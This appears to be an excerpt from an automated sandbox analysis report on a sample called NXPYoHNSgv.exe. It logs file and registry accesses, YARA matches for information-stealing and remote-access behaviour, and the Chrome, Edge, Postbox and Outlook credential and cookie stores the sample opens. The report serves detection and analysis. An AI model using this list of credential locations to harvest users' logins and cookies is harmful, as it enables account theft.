Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Users\user\Desktop\NXPYoHNSgv.exe VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Users\user\Desktop\NXPYoHNSgv.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality

Source: Yara match File source: 00000005.00000002.4620367075.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 5.2.NXPYoHNSgv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.4071400.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.NXPYoHNSgv.exe.402d9e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4614455750.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4620367075.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.000000000402D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2155642817.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 1036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: NXPYoHNSgv.exe PID: 7000, type: MEMORYSTR